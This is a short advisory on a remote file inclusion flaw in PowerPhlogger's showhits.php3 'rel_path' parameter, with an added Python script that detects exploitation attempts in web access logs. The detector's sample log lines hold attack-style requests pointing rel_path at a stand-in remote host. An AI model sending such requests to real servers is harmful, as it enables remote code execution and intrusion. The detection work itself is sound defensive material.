A vulnerability has been discovered in PowerPhlogger. The issue is present in the 'showhits.php3' script. The 'rel_path' parameter, which is used to locate included files, can be set to a remote location specified by an attacker. This may allow an attacker to execute arbitrary commands with the privileges of the webserver by including a malicious PHP script from an attacker-supplied host. It is not known whether newer versions of PowerPhlogger address this issue.
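A log check for the request pattern described above, as an added example (not part of the advisory and not PowerPhlogger code): it scans web server access-log lines for requests to 'showhits.php3' whose 'rel_path' value points off-host, including percent-encoded values that a plain text search would miss. The Common/Combined log format, the /pphlogger/ install path, the client addresses and the host remote.example are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request portion of a Common/Combined Log Format line (format is an assumption).
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')
# Value that points off-host: scheme://, protocol-relative //, or UNC \\host.
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.\-]*://|//|\\\\)', re.IGNORECASE)


def find_remote_rel_path(log_lines):
    """Return (client_ip, rel_path) for showhits.php3 requests with a remote rel_path."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a parseable request line
        url = urlsplit(m.group("target"))
        if not url.path.lower().endswith("/showhits.php3"):
            continue
        # parse_qsl percent-decodes names and values, so encoded URLs are caught.
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            if name == "rel_path" and REMOTE_RE.match(value):
                hits.append((m.group("ip"), value))
    return hits


# Constructed sample lines: documentation address ranges and example hosts only.
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2003:10:00:00 +0000] '
    '"GET /pphlogger/showhits.php3?rel_path=http://remote.example/inc/ HTTP/1.0" 200 512',
    '192.0.2.10 - - [01/Jan/2003:10:01:00 +0000] '
    '"GET /pphlogger/showhits.php3?rel_path=./ HTTP/1.0" 200 2048',
    '203.0.113.5 - - [01/Jan/2003:10:02:00 +0000] '
    '"GET /pphlogger/showhits.php3?id=1&rel_path=ftp%3A%2F%2Fremote.example%2Finc%2F HTTP/1.1" 200 512',
    '192.0.2.11 - - [01/Jan/2003:10:03:00 +0000] '
    '"GET /pphlogger/showhits.php3?id=1 HTTP/1.0" 200 2048',
]

if __name__ == "__main__":
    for ip, value in find_remote_rel_path(SAMPLE_LOG):
        print(f"{ip} requested showhits.php3 with remote rel_path={value}")
```

Values sent in a POST body do not appear in access logs, so this check covers only the query string.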